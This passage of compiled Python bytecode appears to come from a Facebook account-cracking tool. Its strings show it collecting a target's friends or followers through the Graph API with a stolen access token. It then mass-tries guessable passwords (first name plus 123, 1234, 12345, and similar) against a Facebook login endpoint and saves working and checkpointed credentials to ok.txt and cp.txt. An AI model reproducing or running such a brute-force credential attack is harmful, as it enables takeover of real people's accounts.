3\x01\x00}\x04\x00d\x02\x00GHt\x05\x00j\x06\x00d\t\x00|\x03\x00\x17d\n\x00\x17|\x04\x00\x17d\x0b\x00t\x07\x00\x83\x01\x01j\x08\x00}\x05\x00t\t\x00j\n\x00|\x05\x00\x83\x01\x00}\x06\x00d\x0c\x00|\x06\x00k\x06\x00r\x1d\x01t\x0b\x00d\r\x00d\x0e\x00\x83\x02\x00}\x07\x00|\x07\x00j\x0c\x00|\x06\x00d\x0c\x00\x19\x83\x01\x00\x01|\x07\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x0e\x00d\x0f\x00|\x06\x00d\x0c\x00\x19\x17\x83\x01\x00\x01t\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01nV\x00d\x12\x00|\x06\x00d\x13\x00\x19k\x06\x00rX\x01d\x14\x00GHd\x02\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x1b\x00d\x16\x00GHd\x02\x00GHt\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mFB ID/PASS Login\x1b[0;97ms\x0f\x00\x00\x00 ID/Mail/Num : R\x18\x00\x00\x00t\x01\x00\x00\x00(t\x01\x00\x00\x00)s\x0e\x00\x00\x00 Password : s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=t\x07\x00\x00\x00headerst\x03\x00\x00\x00locs\r\x00\x00\x00.fb_token.txtR\x16\x00\x00\x00sG\x00\x00\x00https://graph.facebook.com/me/friends?uid=100000395779504&access_token=i\x01\x00\x00\x00s)\x00\x00\x00\t \x1b[1;31mLogged in successfully\x1b[0;97ms\x10\x00\x00\x00www.facebook.comt\x05\x00\x00\x00errors8\x00\x00\x00\t \x1b[1;31mUser must verify account before login\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again s.\x00\x00\x00\t\x1b[1;31mID/Number/Password may be wrong\x1b[0;97m(\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00t\x07\x00\x00\x00replaceR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\x06\x00\x00\x00headerR \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00postR"\x00\x00\x00R#\x00\x00\x00R\x0b\x00\x00\x00R&\x00\x00\x00(\x08\x00\x00\x00t\x02\x00\x00\x00idt\x03\x00\x00\x00id1t\x03\x00\x00\x00id2t\x03\x00\x00\x00uidt\x03\x00\x00\x00pwdt\x04\x00\x00\x00dataR*\x00\x00\x00t\x05\x00\x00\x00hamza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R&\x00\x00\x00x\x00\x00\x00s@\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x12\x01\x12\x01\x12\x01\x0c\x01\x05\x01$\x01\x0f\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x01\x05\x01\r\x01\n\x01\x10\x01\x05\x01\x05\x01\r\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00t\x0f\x00\x17d\x10\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x11\x00\x83\x01\x00\x01d\x08\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x18\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s;\x00\x00\x00\t \x1b[1;31m\xe2\x9d\xa4\xef\xb8\x8fTurn on mobile data OR wifi\xe2\x9d\xa4\xef\xb8\x8f \x1b[0;97ms\'\x00\x00\x00\x1b[1;93mPress enter to try again \x1b[0;97ms\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In UsersA\x00\x00\x00echo -e "-----------------------------------------------"| lolcats\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x15\x00\x00\x00\x1b[1;93m[3] View tokens\x1d\x00\x00\x00\x1b[1;93m[4] Find date of births\x1d\x00\x00\x00\x1b[1;93m[5] Return method menus\x11\x00\x00\x00\x1b[1;93m[6] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00readR\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00t\n\x00\x00\x00exceptionsR\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00b_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00nmft\x02\x00\x00\x00ok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x0f\x00\x00\x00\x9a\x00\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x15\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00s\x9d\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xm\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\x1c\x02|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x16\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHd\x18\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\xcb\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03Wnz\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x1d\x00k\x02\x00r\x94\x03t\x12\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1e\x00k\x02\x00r\xaa\x03t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1f\x00t\x14\x00\x17d \x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d!\x00t\x17\x00t\x18\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x19\x00j\x1a\x00d"\x00\x83\x01\x00\x01d#\x00GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d&\x00\x86\x00\x00}\n\x00t\x1b\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1c\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x11\x00GHd$\x00d%\x00\x14GHd\x04\x00GHd(\x00GHd)\x00t\x17\x00t\x18\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x17\x00t\x18\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GHt\x00\x00d+\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x16\x00\x00\x00\x1b[1;93mPut Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x15\x00\x00\x00\x1b[1;93mTarget user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00t\x01\x00\x00\x00|R\r\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x15\x00\x00\x00\x1b[1;92mPut Id/user : R.\x00\x00\x00s\x0e\x00\x00\x00Target user : s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000t\x01\x00\x00\x003t\x01\x00\x00\x004t\x01\x00\x00\x005t\x01\x00\x00\x006s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s:\x00\x00\x00\x1b[1;94mSILAHKAN DI TUNGGU process is running in backgroundi/\x00\x00\x00t\x01\x00\x00\x00-c\x01\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sE\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\x1c\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x00d\t\x00GHd\n\x00t\x07\x00d\x0b\x00\x19\x17GHd\x0c\x00|\x01\x00\x17GHd\r\x00|\x04\x00\x17d\x0e\x00\x17GHt\x08\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00d\x11\x00|\x01\x00\x17d\x12\x00\x17|\x04\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01nf\x06d\x13\x00|\x06\x00k\x06\x00r\x18\x01d\x14\x00GHd\x15\x00t\x07\x00d\x0b\x00\x19\x17GHd\x16\x00|\x01\x00\x17GHd\x17\x00|\x04\x00\x17d\x0e\x00\x17GH\x88\x01\x00j\x0b\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\x1e\x06|\x03\x00d\x18\x00\x17}\x08\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xbc\x01d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nz\x05d\x13\x00|\x06\x00k\x06\x00r\x1f\x02d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x17\x05|\x03\x00d\x1f\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xc3\x02d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ns\x04d\x13\x00|\x06\x00k\x06\x00r&\x03d \x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x10\x04|\x03\x00d!\x00\x17}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xca\x03d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nl\x03d\x13\x00|\x06\x00k\x06\x00r-\x04d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\t\x03d"\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xcd\x04d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ni\x02d\x13\x00|\x06\x00k\x06\x00r0\x05d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x06\x02d#\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x05d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nf\x01d\x13\x00|\x06\x00k\x06\x00r3\x06d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x03\x01d$\x00}\x0f\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0f\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd3\x06d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nc\x00d\x13\x00|\x06\x00k\x06\x00r6\x07d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR@\x00\x00\x00t\x03\x00\x00\x00123s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=vi_vn&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705cR.\x00\x00\x00s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x96] \x1b[1;93mCEKPOINTs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93mR\x17\x00\x00\x00s-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;93ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93ms\x01\x00\x00\x00\ns\x10\x00\x00\x00out/super_cp.txtt\x01\x00\x00\x00as\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x0c\x00\x00\x00access_tokens\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mBERHASILs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92mt\x04\x00\x00\x001234s\x11\x00\x00\x00\x1b[1;93m[RAKA-CP] s\x03\x00\x00\x00 | s\x06\x00\x00\x00cp.txts\x18\x00\x00\x00\x1b[1;92m[RAKA-OK] \x1b[1;30ms\x06\x00\x00\x00\x1b[1;0ms\x06\x00\x00\x00ok.txtt\x05\x00\x00\x0012345s\x19\x00\x00\x00 \x1b[1;92m[RAKA-OK] \x1b[1;30mt\x06\x00\x00\x00123456t\x06\x00\x00\x00223344t\x06\x00\x00\x00334455t\x06\x00\x00\x00445566(\x0c\x00\x00\x00t\x05\x00\x00\x00splitR\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00bR\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x06\x00\x00\x00append(\x10\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userR7\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00pass1R*\x00\x00\x00t\x01\x00\x00\x00dt\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x02\x00\x00\x00cpR?\x00\x00\x00t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7(\x02\x00\x00\x00t\x03\x00\x00\x00cpst\x03\x00\x00\x00oks(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main$\x01\x00\x00s\xe0\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01(\x01\x0f\x01\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\r\x02\x0c\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x15\x00\x00\x00\x1b[1;93mTotal Cp/Ok : t\x01\x00\x00\x00/s\x1b\x00\x00\x00\x1b[1;93mPress enter to back (\x1d\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 